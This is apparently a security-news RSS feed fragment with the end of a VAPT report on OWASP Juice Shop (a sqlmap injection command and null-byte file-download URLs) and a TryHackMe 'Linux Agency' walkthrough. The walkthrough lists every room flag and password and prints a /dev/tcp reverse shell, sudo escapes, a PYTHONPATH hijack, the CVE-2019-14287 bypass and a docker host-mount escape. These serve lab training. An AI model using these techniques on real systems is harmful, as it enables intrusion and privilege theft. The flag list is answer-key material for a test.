SQL Command (SQL Injection)</p><h3>Severity (CVSS v3.1)</h3><p><strong>CVSS Vector:</strong><br> CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</p><h3>Metrics</h3><ul><li>Attack Vector: Network</li><li>Attack Complexity: Low</li><li>Privileges Required: None</li><li>User Interaction: None</li><li>Scope: Unchanged</li><li>Confidentiality Impact: High</li><li>Integrity Impact: High</li><li>Availability Impact: None</li></ul><p><strong>CVSS Base Score:</strong> 9.1 (Critical)</p><h3>Description</h3><p>The /rest/products/search API endpoint accepts user input via the <strong>q</strong> parameter to search for products. This input is directly incorporated into backend SQL queries without sufficient sanitization or parameterization.</p><p>An attacker can exploit this weakness to inject arbitrary SQL commands, allowing enumeration of database schema and extraction of sensitive information. Automated tools such as <strong>sqlmap</strong> can successfully detect and exploit this vulnerability, confirming the presence of SQL injection.</p><p>This issue represents a complete breakdown of input validation and secure query handling, posing a serious risk to application confidentiality and integrity.</p><h3>Exploit Using sqlmap</h3><pre>sqlmap -u "http://localhost:3000/rest/products/search?q=apple" --tables</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oE0CHEd8TUToNy1MGhy4qg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*m9UhO9JS5Hl3YCBxryIDuA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*m6jvJUSScWD63XiOpBgzuQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oTjbupN8n126CTwsYotbYQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KFsmogCi-BSuofuUDJ45vg.png"></figure><p>Got User credentials :)</p><h3>Suggested Remediation</h3><ul><li>Sanitize and validate all user-supplied inputs</li><li>Implement parameterized queries</li><li>Deploy a Web Application Firewall (WAF)</li><li>Enable logging &amp; monitoring</li></ul><h3>References</h3><ol><li><a href="https://owasp.org/www-community/attacks/SQL_Injection">OWASP SQL Injection Prevention Cheat Sheet</a></li><li><a href="https://cwe.mitre.org/data/definitions/89.html">CWE-89 — SQL Injection</a></li><li><a href="https://owasp.org/www-project-juice-shop/">OWASP Juice Shop Documentation</a></li><li>CVSS v3.1 Specification: <a href="https://www.first.org/cvss/v3.1/">https://www.first.org/cvss/v3.1/</a></li></ol><h3>4. Arbitrary File Download via Poison Null Byte Injection</h3><h3>Summary (with CWE)</h3><p>The application is vulnerable to <strong>Poison Null Byte Injection</strong>, allowing an attacker to bypass file extension validation and download <strong>sensitive backup files</strong> stored on the server. By exploiting improper input validation and unsafe file handling, restricted backup files such as developer and salesman data can be accessed.</p><h3>CWE ID</h3><ul><li>CWE-158 — Improper Neutralization of Null Byte</li><li>CWE-22 — Improper Limitation of Pathname to Restricted Directory</li></ul><h3>Severity (CVSS v3.1)</h3><p><strong>CVSS Vector:</strong><br> CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</p><p><strong>CVSS Base Score:</strong> 7.5 (High)</p><h3>Description</h3><p>OWASP Juice Shop restricts file downloads in the /ftp endpoint by validating file extensions. However, this validation can be bypassed using a <strong>Poison Null Byte (%00) injection</strong> combined with <strong>double URL encoding</strong>.</p><p>The backend improperly handles null bytes during file system access, causing the application to truncate the filename at the null byte and serve restricted backup files (e.g., .bak) while still passing extension validation checks.</p><p>This results in <strong>unauthorized access to sensitive backup files</strong>, potentially exposing configuration details, credentials, or business data.</p><h3>Steps to Reproduce:</h3><h4><strong>Access a Developer’s Forgotten Backup File:</strong></h4><ol><li>Navigate to the FTP directory: <a href="http://localhost:3000/ftp">http://localhost:3000/ftp</a></li><li>Attempt direct access (fails due to extension restriction): <a href="http://localhost:3000/ftp/package.json.bak">http://localhost:3000/ftp/package.json.bak</a></li><li>Try Poison Null Byte injection (fails initially): <a href="http://localhost:3000/ftp/package.json.bak%00.md">http://localhost:3000/ftp/package.json.bak%00.md</a></li><li>URL-encode the % character as well: <a href="http://localhost:3000/ftp/package.json.bak%2500.md">http://localhost:3000/ftp/package.json.bak%2500.md</a></li></ol><p>The server successfully returns the <strong>restricted backup file</strong>, completing the exploit.</p><h4><strong>Access a Salesman’s Forgotten Backup File</strong>:</h4><ol><li>Use the same Poison Null Byte technique: <a href="http://localhost:3000/ftp/coupons_2013.md.bak%2500.md">http://localhost:3000/ftp/coupons_2013.md.bak%2500.md</a></li><li>The backup file downloads successfully, revealing sensitive business data.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lvtP_eSL1Sza2N8_1_1Yag.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*VxtA320Y7ic8X98oKXa02A.png"></figure><p>Backup file downloads successfully.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZwQ-UUtHidNkJxdbtjDSgw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/887/1*-mITIIF8p-SjS0LxXk8ViQ.png"></figure><h3>Suggested Remediation</h3><ul><li>Reject null bytes explicitly</li><li>Decode input before validation</li><li>Use allow-listed file access</li><li>Disable public access to backups</li><li>Use secure file APIs</li></ul><h3>References</h3><ol><li><a href="https://owasp.org/www-project-juice-shop/">OWASP Foundation — OWASP Juice Shop</a></li><li><a href="https://cwe.mitre.org/data/definitions/158.html">CWE-158: Improper Neutralization of Null Byte</a></li><li><a href="https://owasp.org/www-project-web-security-testing-guide/">OWASP Testing Guide — File Handling Vulnerabilities</a></li><li><a href="https://portswigger.net/web-security/file-path-traversal">PortSwigger — File Path Traversal &amp; Null Byte Attacks</a></li></ol><h3>Thanks For Reading :)</h3><p><strong>Happy Hacking ;)</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f8440a9735c1" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/vapt-report-example-f8440a9735c1">VAPT Report Example</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Linux Agency | Complete Write-Up & Walkthrough]]></title>
<description><![CDATA[“Agent 47, your mission begins. 30 targets stand between you and the root.”Author: Shikhali JamalzadeGitHub: github.com/alisaliveLinkedIn: linkedin.com/in/camalzads📋 Room OverviewPlatform TryHackMe Room Name Linux Agency Link https://tryhackme.com/room/linuxagency Difficulty Medium Category Linux...]]></description>
<link>https://tsecurity.de/de/3675298/hacking/tryhackme-linux-agency-complete-write-up-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675298/hacking/tryhackme-linux-agency-complete-write-up-walkthrough/</guid>
<pubDate>Fri, 17 Jul 2026 09:09:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KSkSbmZiLuuvwoZUpWjb2w.png"></figure><blockquote>“Agent 47, your mission begins. 30 targets stand between you and the root.”<br>Author: <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br>GitHub<strong>:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a><br>LinkedIn<strong>:</strong> <a href="https://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></blockquote><h3>📋 Room Overview</h3><p><strong>Platform</strong> TryHackMe <br><strong>Room Name</strong> Linux Agency <br><strong>Link</strong> <a href="https://tryhackme.com/room/linuxagency">https://tryhackme.com/room/linuxagency</a> <br><strong>Difficulty</strong> Medium <br><strong>Category</strong> Linux Fundamentals + Privilege Escalation <br><strong>Initial Access</strong> SSH (agent47)</p><h3>🎯 About This Room</h3><p><strong>Linux Agency</strong> is one of the most comprehensive Linux-focused rooms on TryHackMe. You play the role of <strong>Agent 47</strong> — a secret agent tasked with infiltrating the ICA Agency, chaining through <strong>30 mission accounts</strong>, eliminating special targets, and ultimately achieving <strong>root</strong>.</p><p>This room goes far beyond basic Linux commands — it forces you to think like a real penetration tester. Topics covered:</p><ul><li>🐧 Deep Linux fundamentals (hidden files, permissions, environment variables)</li><li>💻 Multiple programming languages (Python, Ruby, Java, C)</li><li>🔐 Encoding/decoding (Base64, Binary, Hex)</li><li>📅 Cron job exploitation</li><li>⚡ Sudo privilege escalation via GTFOBins</li><li>🐳 Docker privilege escalation</li><li>🔑 SSH private key cracking</li></ul><h3>🛠️ Tools Used</h3><ul><li>ssh, su, find, grep, cat, ls, strings, file</li><li>base64, xxd</li><li>gcc, javac, java, python3, ruby</li><li>netcat (nc)</li><li>ssh2john + john (John the Ripper)</li><li>ss (socket statistics)</li><li>GTFOBins</li><li>Docker</li></ul><h3>⚙️ Setup</h3><p>Start the machine on TryHackMe and wait about a minute. Then connect:</p><pre>ssh agent47@&lt;MACHINE_IP&gt;</pre><p><strong>Password:</strong> 640509040147</p><p>Once connected you’ll see:</p><pre>agent47@linuxagency:~$</pre><p>The mission begins. 🚀</p><h3>🗂️ Task 2: Initial Access</h3><p>The room’s mechanic is straightforward:</p><ul><li>Every flag found acts as the <strong>password</strong> for the next user</li><li>Flag format: missionX{md5_hash}</li><li>Chain: agent47 → mission1 → mission2 → ... → mission30 → viktor → ...</li></ul><h3>🔍 Task 3: Linux Fundamentals (Mission 1–30 + Viktor)</h3><h3>🎯 Mission 1</h3><p>As <strong>agent47</strong>, the first task is finding mission1’s flag.</p><pre>find / -type f -name "*.txt" 2&gt;/dev/null<br># Or directly check:<br>ls /home/mission1/<br>cat /home/mission1/&lt;flag_file&gt;</pre><p>Now switch to mission1:</p><pre>su mission1<br># Password: mission1{174dc8f191bcbb161fe25f8a5b58d1f0}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>find for filesystem-wide searching, understanding the </em><em>/home directory structure.</em></blockquote><h3>🎯 Mission 2</h3><p>As <strong>mission1</strong>:</p><pre>find / -type f -name "mission2" 2&gt;/dev/null<br>cat &lt;found_path&gt;</pre><pre>su mission2<br># Password: mission2{8a1b68bb11e4a35245061656b5b9fa0d}</pre><h3>🎯 Mission 3</h3><pre># As mission2:<br>grep -r "mission3" . 2&gt;/dev/null</pre><pre>su mission3<br># Password: mission3{ab1e1ae5cba688340825103f70b0f976}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>grep -r for recursive content searching across directories.</em></blockquote><h3>🎯 Mission 4</h3><pre># As mission3:<br>cd /home/mission3<br>ls<br>cat flag.txt</pre><pre>su mission4<br># Password: mission4{264a7eeb920f80b3ee9665fafb7ff92d}</pre><h3>🎯 Missions 5–8</h3><p>These follow a similar pattern — searching the filesystem:</p><pre># As mission4:<br>grep -r "mission5" / 2&gt;/dev/null<br>su mission5<br># Password: mission5{bc67906710c3a376bcc7bd25978f62c0}</pre><pre># As mission5:<br>grep -r "mission6" / 2&gt;/dev/null<br>su mission6<br># Password: mission6{1fa67e1adc244b5c6ea711f0c9675fde}</pre><pre># As mission6:<br>grep -r "mission7" / 2&gt;/dev/null<br>su mission7<br># Password: mission7{53fd6b2bad6e85519c7403267225def5}</pre><pre># As mission7:<br>grep -r "mission8" / 2&gt;/dev/null<br>su mission8<br># Password: mission8{3bee25ebda7fe7dc0a9d2f481d10577b}</pre><h3>🎯 Mission 9</h3><pre># As mission8:<br>ls<br>cat flag.txt</pre><pre>su mission9<br># Password: mission9{ba1069363d182e1c114bef7521c898f5}</pre><h3>🎯 Missions 10–11</h3><pre># As mission9:<br>grep -r "mission10" / 2&gt;/dev/null<br>su mission10<br># Password: mission10{0c9d1c7c5683a1a29b05bb67856524b6}</pre><pre># As mission10:<br>grep -r "mission11" / 2&gt;/dev/null<br>su mission11<br># Password: mission11{db074d9b68f06246944b991d433180c0}</pre><h3>🎯 Mission 12 — Environment Variable</h3><p>This time the flag is hidden inside an <strong>environment variable</strong>, not a file!</p><pre># As mission11:<br>env | grep mission12</pre><pre>su mission12<br># Password: mission12{f449a1d33d6edc327354635967f9a720}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>env command lists all environment variables. In real-world pentesting, environment variables frequently contain credentials, API keys, and sensitive data — always check them!</em></blockquote><h3>🎯 Mission 13 — File Permissions</h3><pre># As mission12:<br>ls -la /home/mission12/<br># flag.txt exists but you have no read permission!<br>chmod 777 /home/mission12/flag.txt<br>cat /home/mission12/flag.txt</pre><pre>su mission13<br># Password: mission13{076124e360406b4c98ecefddd13ddb1f}</pre><blockquote><strong>💡 What we learned:</strong><em> Linux file permissions and </em><em>chmod. Always use </em><em>ls -la — the </em><em>-a flag reveals hidden files and the </em><em>-l flag shows permissions clearly.</em></blockquote><h3>🎯 Mission 14 — Base64 Decode</h3><pre># As mission13:<br>cat /home/mission13/flag.txt | base64 -d</pre><pre>su mission14<br># Password: mission14{d598de95639514b9941507617b9e54d2}</pre><blockquote><strong>💡 What we learned:</strong><em> Base64 encoding/decoding. Strings ending with </em><em>= or </em><em>== are almost always Base64-encoded. The </em><em>base64 -d flag decodes them directly in the terminal.</em></blockquote><h3>🎯 Mission 15 — Binary → ASCII</h3><pre># As mission14:<br>cat /home/mission14/flag.txt<br># You'll see binary digits: 01101101 01101001 ...</pre><p>Convert the binary to ASCII using Python:</p><pre>python3 -c "<br>binary = '01101101 01101001 01110011 01110011 01101001 01101111 01101110 00110001 00110101'<br>chars = binary.split()<br>result = ''.join([chr(int(b, 2)) for b in chars])<br>print(result)<br>"</pre><p>Or use an online tool: <a href="https://www.rapidtables.com/convert/number/binary-to-ascii.html">https://www.rapidtables.com/convert/number/binary-to-ascii.html</a></p><pre>su mission15<br># Password: mission15{fc4915d818bfaeff01185c3547f25596}</pre><blockquote><strong>💡 What we learned:</strong><em> Binary → ASCII conversion. Recognizing encoding formats on sight is a key CTF skill.</em></blockquote><h3>🎯 Mission 16 — Hex → ASCII</h3><pre># As mission15:<br>cat /home/mission15/flag.txt | xxd -r -p</pre><p>xxd -r -p converts a raw hex string directly back to ASCII.</p><pre>su mission16<br># Password: mission16{884417d40033c4c2091b44d7c26a908e}</pre><blockquote><strong>💡 What we learned:</strong><em> Hex decoding. </em><em>xxd dumps hex (-p for plain hex), and with </em><em>-r it reverses the process.</em></blockquote><h3>🎯 Mission 17 — Execute Permission</h3><pre># As mission16:<br>ls -la /home/mission16/<br># There's a 'flag' binary but it has no execute permission<br>chmod u+x /home/mission16/flag<br>./flag</pre><pre>su mission17<br># Password: mission17{49f8d1348a1053e221dfe7ff99f5cbf4}</pre><h3>🎯 Mission 18 — Java</h3><pre># As mission17:<br>ls /home/mission17/<br># flag.java found<br>cd /home/mission17/<br>javac flag.java      # Compile<br>java flag            # Run</pre><pre>su mission18<br># Password: mission18{f09760649986b489cda320ab5f7917e8}</pre><blockquote><strong>💡 What we learned:</strong><em> Java compilation workflow: </em><em>javac compiles </em><em>.java → </em><em>.class, then </em><em>java runs the class.</em></blockquote><h3>🎯 Mission 19 — Ruby</h3><pre># As mission18:<br>ruby /home/mission18/flag.rb</pre><pre>su mission19<br># Password: mission19{a0bf41f56b3ac622d808f7a4385254b7}</pre><h3>🎯 Mission 20 — C Language</h3><pre># As mission19:<br>cd /home/mission19/<br>gcc flag.c -o flag   # Compile<br>./flag               # Run</pre><pre>su mission20<br># Password: mission20{b0482f9e90c8ad2421bf4353cd8eae1c}</pre><blockquote><strong>💡 What we learned:</strong><em> C compilation: </em><em>gcc source.c -o output_name then </em><em>./output_name to execute.</em></blockquote><h3>🎯 Mission 21 — Python</h3><pre># As mission20:<br>python3 /home/mission20/flag.py</pre><pre>su mission21<br># Password: mission21{7de756aabc528b446f6eb38419318f0c}</pre><h3>🎯 Mission 22 — Restricted Shell Escape (script)</h3><p>When you log in as <strong>mission21</strong>, you’re dropped into a restricted shell. Escape using:</p><pre>script -qc /bin/bash /dev/null</pre><p>This spawns a full bash shell. Now check .bashrc:</p><pre>cat ~/.bashrc<br># You'll find a Base64-encoded string<br>echo '&lt;base64_string&gt;' | base64 -d</pre><pre>su mission22<br># Password: mission22{24caa74eb0889ed6a2e6984b42d49aaf}</pre><blockquote><strong>💡 What we learned:</strong><em> Restricted shell escape using the </em><em>script command, which opens a new terminal session. Always check </em><em>.bashrc and </em><em>.bash_profile — attackers hide data there, and defenders do too.</em></blockquote><h3>🎯 Mission 23 — Python Interpreter Shell Escape</h3><p>Logging in as <strong>mission22</strong> drops you into a Python REPL. Escape to bash:</p><pre>import pty<br>pty.spawn("/bin/bash")</pre><p>Now read the flag:</p><pre>cat /home/mission22/flag.txt</pre><pre>su mission23<br># Password: mission23{3710b9cb185282e3f61d2fd8b1b4ffea}</pre><blockquote><strong>💡 What we learned:</strong><em> Python </em><em>pty.spawn() for shell escape — this is also a standard technique for upgrading dumb reverse shells to fully interactive TTYs in real engagements!</em></blockquote><h3>🎯 Mission 24 — Virtual Host + cURL</h3><pre># As mission23:<br>cat /home/mission23/message.txt<br>cat /etc/hosts<br># You'll see mission24.com mapped to 127.0.0.1<br>curl http://mission24.com -s | grep mission</pre><pre>su mission24<br># Password: mission24{dbaeb06591a7fd6230407df3a947b89c}</pre><blockquote><strong>💡 What we learned:</strong><em> Virtual hosting — the </em><em>/etc/hosts file acts as a local DNS resolver. In real engagements, always check </em><em>/etc/hosts for internal hostnames that reveal additional attack surface.</em></blockquote><h3>🎯 Mission 25 — Binary Analysis + viminfo</h3><pre># As mission24:<br>ls /home/mission24/<br>file bribe              # Check the file type<br>./bribe                 # Execute it — it writes to .viminfo<br>grep mission /home/mission24/.viminfo</pre><pre>su mission25<br># Password: mission25{61b93637881c87c71f220033b22a921b}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>file command identifies file types regardless of extension. </em><em>.viminfo is a hidden file storing Vim history — always run </em><em>ls -la to catch hidden files!</em></blockquote><h3>🎯 Mission 26 — PATH Manipulation</h3><p>Logging in as <strong>mission25</strong> gives you a broken environment — commands don’t work because $PATH is corrupted.</p><pre>echo $PATH<br># Empty or wrong PATH</pre><pre>export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin<br>ls -lhA<br>cat flag.txt</pre><pre>su mission26<br># Password: mission26{cb6ce977c16c57f509e9f8462a120f00}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>$PATH environment variable defines where the shell looks for executables. This concept is the foundation of PATH hijacking attacks — one of the most common Linux PrivEsc vectors.</em></blockquote><h3>🎯 Mission 27 — Steganography with strings</h3><pre># As mission26:<br>ls /home/mission26/<br>strings -n 20 /home/mission26/flag.jpg</pre><p>strings extracts human-readable strings from binary files. -n 20 filters results to strings of at least 20 characters.</p><pre>su mission27<br># Password: mission27{444d29b932124a48e7dddc0595788f4d}</pre><blockquote><strong>💡 What we learned:</strong><em> Basic steganography — data hidden inside image files. </em><em>strings is a quick first step when analyzing any binary or media file during a CTF or real engagement.</em></blockquote><h3>🎯 Mission 28 — Absurdly Long Filename</h3><pre># As mission27:<br>ls /home/mission27/<br>less flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz</pre><p>Yes, the filename is exactly that long. less handles it fine.</p><pre>su mission28<br># Password: mission28{03556f8ca983ef4dc26d2055aef9770f}</pre><h3>🎯 Mission 29 — Ruby Interpreter + Reverse String</h3><p>Logging in as <strong>mission28</strong> drops you into a Ruby REPL.</p><p><strong>Option 1 — Escape to shell:</strong></p><pre>exec "/bin/bash"</pre><p><strong>Option 2 — Read the file directly from Ruby:</strong></p><pre>Dir.chdir("/home/mission28")<br>puts File.open("txt.galf").readlines</pre><p>The flag is written in reverse! You’ll see something like:</p><pre>'}1fff2ad47eb52e68523621b8d50b2918{92noissim'</pre><p>Reverse it:</p><pre>'}1fff2ad47eb52e68523621b8d50b2918{92noissim'.reverse</pre><pre>su mission29<br># Password: mission29{8192b05d8b12632586e25be74da2fff1}</pre><blockquote><strong>💡 What we learned:</strong><em> Ruby interpreter escape. String reversal is a common obfuscation technique in CTFs. Also notice the filename </em><em>txt.galf — that's </em><em>flag.txt reversed!</em></blockquote><h3>🎯 Mission 30 — Bludit CMS Enumeration</h3><pre># As mission29:<br>ls /home/mission29/<br>grep -rn "mission30" /home/mission29/bludit/</pre><p>The flag is buried inside Bludit CMS’s file structure.</p><pre>su mission30<br># Password: mission30{d25b4c9fac38411d2fcb4796171bda6e}</pre><h3>🎯 Viktor — Git History</h3><pre># As mission30:<br>ls /home/mission30/<br>cd /home/mission30/Escalator/<br>git --no-pager log</pre><p>Browse the git commit history — the flag is hidden in there.</p><pre>su viktor<br># Password: viktor{b52c60124c0f8f85fe647021122b3d9a}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>git log reveals commit history. In real-world pentesting, exposed git repositories are a goldmine — credentials, API keys, and internal logic are frequently committed and never properly removed.</em></blockquote><h3>🔓 Task 4: Privilege Escalation</h3><p>You’re now <strong>viktor</strong>. The “special targets” phase begins — each user requires a different privilege escalation technique.</p><h3>🎯 Dalia — Cron Job Exploitation</h3><pre># As viktor:<br>cat /etc/crontab</pre><p>Output:</p><pre>* * * * * root bash /opt/scripts/47.sh</pre><p>Root runs /opt/scripts/47.sh every minute. Check the script and your permissions:</p><pre>cat /opt/scripts/47.sh<br>ls -la /opt/scripts/47.sh<br># You have write access!</pre><p><strong>Step 1:</strong> Create your reverse shell payload:</p><pre>vim /tmp/eop.sh</pre><p>Contents:</p><pre>#!/bin/bash<br>bash -i &gt;&amp; /dev/tcp/127.0.0.1/9999 0&gt;&amp;1</pre><p><strong>Step 2:</strong> Base64-encode it and overwrite the cron script:</p><pre>cat /tmp/eop.sh | base64 -w 0<br># Copy the output, then:<br>echo 'IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx' | base64 -d &gt; /opt/scripts/47.sh</pre><p><strong>Step 3:</strong> Set up your listener:</p><pre>nc -nlvp 9999</pre><p>Wait up to 60 seconds. The cron job fires and you get a shell as <strong>dalia</strong>:</p><pre># In the received shell:<br>id<br># uid=1000(dalia) ...<br>cat /home/dalia/flag.txt</pre><p><strong>Upgrade the shell (important for stability):</strong></p><pre>python3 -c 'import pty;pty.spawn("/bin/bash")'<br>export TERM=xterm<br>export SHELL=bash<br># Press Ctrl+Z<br>stty raw -echo; fg</pre><p>Flag: dalia{4a94a7a7bb4a819a63a33979926c77dc}</p><blockquote><strong>💡 What we learned:</strong><em> Cron job exploitation — one of the most common Linux PrivEsc vectors in the wild. The checklist: find writable scripts executed by root → inject reverse shell → wait. Always enumerate </em><em>/etc/crontab, </em><em>/etc/cron.d/, and </em><em>/var/spool/cron/.</em></blockquote><h3>🎯 Silvio — sudo + zip (GTFOBins)</h3><pre># As dalia:<br>sudo -l<br># (dalia) NOPASSWD: /usr/bin/zip as silvio</pre><p>From GTFOBins — zip sudo escape:</p><pre>TF=$(mktemp -u)<br>sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'</pre><pre>id<br># uid=... (silvio)<br>cat /home/silvio/flag.txt</pre><p>Flag: silvio{657b4d058c03ab9988875bc937f9c2ef}</p><blockquote><strong>💡 What we learned:</strong><em> </em><a href="https://gtfobins.github.io/"><em>GTFOBins</em></a><em> — the essential reference for abusing binaries with sudo, SUID, or capabilities. When you see </em><em>sudo -l, immediately cross-reference every allowed binary against GTFOBins.</em></blockquote><h3>🎯 Reza — sudo + git (GTFOBins)</h3><pre># As silvio:<br>sudo -l<br># (silvio) NOPASSWD: /usr/bin/git as reza</pre><p>GTFOBins git sudo escape (uses PAGER environment variable):</p><pre>sudo -u reza PAGER='sh -c "exec sh 0&lt;&amp;1"' git -p help</pre><pre>id<br># uid=... (reza)<br>cat /home/reza/flag.txt</pre><p>Flag: reza{2f1901644eda75306f3142d837b80d3e}</p><blockquote><strong>💡 What we learned:</strong><em> Git’s </em><em>--paginate (</em><em>-p) feature invokes a pager, and by hijacking the </em><em>PAGER env variable we execute arbitrary commands. Many programs that invoke external processes are susceptible to this pattern.</em></blockquote><h3>🎯 Jordan — PYTHONPATH Hijacking</h3><pre># As reza:<br>sudo -l<br># (reza) NOPASSWD: /opt/scripts/Gun-Shop.py as jordan</pre><p>Run the script:</p><pre>sudo -u jordan /opt/scripts/Gun-Shop.py<br># Error: No module named 'shop'</pre><p>The script imports a module called shop which doesn't exist. We can create it in a directory we control:</p><p><strong>Step 1:</strong> Create a malicious shop module:</p><pre>mkdir -p /tmp/shop<br>echo 'import os; os.system("/bin/bash")' &gt; /tmp/shop/shop.py</pre><p><strong>Step 2:</strong> Override PYTHONPATH so Python finds our module first:</p><pre>sudo -u jordan PYTHONPATH=/tmp/shop/ /opt/scripts/Gun-Shop.py</pre><pre>id<br># uid=... (jordan)<br>cat /home/jordan/flag.txt</pre><p>Flag: jordan{fcbc4b3c31c9b58289b3946978f9e3c3}</p><blockquote><strong>💡 What we learned:</strong><em> Python module hijacking — a real-world PrivEsc technique. </em><em>PYTHONPATH tells Python where to search for modules before the standard library paths. If an attacker controls a directory early in that path, they can substitute any module with malicious code.</em></blockquote><h3>🎯 Ken — sudo + less (GTFOBins)</h3><pre># As jordan:<br>sudo -l<br># (jordan) NOPASSWD: /usr/bin/less as ken</pre><pre>sudo -u ken /usr/bin/less /etc/profile</pre><p>Once less opens, type ! followed by:</p><pre>!/bin/sh</pre><p>Press Enter — you drop into a shell as <strong>ken</strong>.</p><pre>id<br>cat /home/ken/flag.txt</pre><p>Flag: ken{4115bf456d1aaf012ed4550c418ba99f}</p><h3>🎯 Sean — sudo + vim (GTFOBins)</h3><pre># As ken:<br>sudo -l<br># (ken) NOPASSWD: /usr/bin/vim as sean</pre><pre>sudo -u sean vim -c ':!/bin/sh'</pre><p>The -c flag runs a Vim command on startup. :!/bin/sh executes a shell command from within Vim.</p><pre>id<br>cat /home/sean/flag.txt</pre><p>Flag: sean{4c5685f4db7966a43cf8e95859801281}</p><blockquote><strong>💡 What we learned:</strong><em> Vim is far more than a text editor — it can execute shell commands, run scripts, and spawn processes. Granting </em><em>sudo vim to any user is effectively granting root.</em></blockquote><h3>🎯 Penelope — Password Hidden in Base64</h3><pre># As sean:<br>printf %s 'VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==' | base64 -d<br># Output: "The password of penelope is p3nelope"</pre><pre>su penelope<br># Password: p3nelope<br>cat /home/penelope/flag.txt</pre><p>Flag: penelope{2da1c2e9d2bd0004556ae9e107c1d222}</p><h3>🎯 Maya — SUID base64 (GTFOBins)</h3><pre># As penelope:<br>ls -lhA /home/penelope/<br># A 'base64' binary with the SUID bit set!</pre><p>GTFOBins SUID base64 exploit — read files as the binary’s owner:</p><pre>LFILE=/home/maya/flag.txt<br>./base64 "$LFILE" | base64 -d</pre><p>Flag: maya{a66e159374b98f64f89f7c8d458ebb2b}</p><blockquote><strong>💡 What we learned:</strong><em> SUID (Set User ID) — when set on a binary, it executes with the file owner’s privileges rather than the caller’s. Find SUID binaries with: </em><em>find / -perm -4000 2&gt;/dev/null. Cross-reference every result with GTFOBins.</em></blockquote><h3>🎯 Robert — SSH Private Key Cracking</h3><pre># As maya:<br>ls -lhA /home/maya/<br>ls -lhA /home/maya/old_robert_ssh/<br># id_rsa and id_rsa.pub found</pre><p><strong>Step 1:</strong> Copy the private key to your local machine (new terminal tab):</p><pre>scp maya@&lt;IP&gt;:/home/maya/old_robert_ssh/id_rsa ./id_rsa_robert<br>chmod 600 id_rsa_robert</pre><p><strong>Step 2:</strong> Convert the key to a crackable hash:</p><pre>ssh2john id_rsa_robert &gt; robert_ssh_hash.txt</pre><p><strong>Step 3:</strong> Crack it with John the Ripper:</p><pre>john robert_ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt</pre><p><strong>Result:</strong> industryweapon</p><p><strong>Step 4:</strong> Find Robert’s SSH port on the target:</p><pre># On the target machine:<br>ss -nlpt | grep 22<br># Port 2222 is listening</pre><p><strong>Step 5:</strong> Connect:</p><pre>ssh robert@127.0.0.1 -p 2222 -i id_rsa_robert<br># Passphrase: industryweapon<br>cat /home/robert/user.txt</pre><p>Flag (user.txt): user{620fb94d32470e1e9dcf8926481efc96}</p><blockquote><strong>💡 What we learned:</strong><em> SSH private key cracking — </em><em>ssh2john extracts the hash, </em><em>john cracks it. In real engagements, always look for </em><em>id_rsa files in home directories, backup folders, and </em><em>.ssh/ directories. Encrypted keys with weak passphrases are a common finding.</em></blockquote><h3>👑 Root — Two-Stage Escalation</h3><h3>Stage 1: CVE-2019–14287 (Sudo User ID Bypass)</h3><pre># As robert:<br>sudo --version<br># Reveals a vulnerable version (&lt; 1.8.28)<br>sudo -u#-1 /bin/bash<br>whoami<br># root!</pre><p><strong>How it works:</strong> This is <strong>CVE-2019–14287</strong>. When a sudoers rule allows a user to run commands as any user, passing -u#-1 causes sudo to interpret the user ID as 0 (root) due to an integer overflow in how sudo handles negative UIDs. Patched in sudo 1.8.28.</p><pre>cd /root<br>ls</pre><h3>Stage 2: Docker Group → Root (root.txt)</h3><pre># As root (inside the container/restricted environment):<br>id<br># You're in the docker group<br>find / -name docker 2&gt;/dev/null<br># Found at /tmp/docker or similar<br>./docker ps -a<br>./docker image ls<br># "mangoman" image exists</pre><p>Mount the host filesystem into a container and chroot into it:</p><pre>./docker run -v /:/mnt --rm -it mangoman chroot /mnt sh</pre><pre>id<br># uid=0(root) gid=0(root) — TRUE host root<br>cat /root/root.txt</pre><p>Flag (root.txt): root{62ca2110ce7df377872dd9f0797f8476}</p><blockquote><strong>💡 What we learned:</strong><em> Docker group membership is equivalent to root access. </em><em>-v /:/mnt mounts the entire host filesystem into the container, and </em><em>chroot /mnt makes the container treat the host filesystem as its root. This is a well-documented container escape — never add untrusted users to the </em><em>docker group.</em></blockquote><h3>🏆 Flags 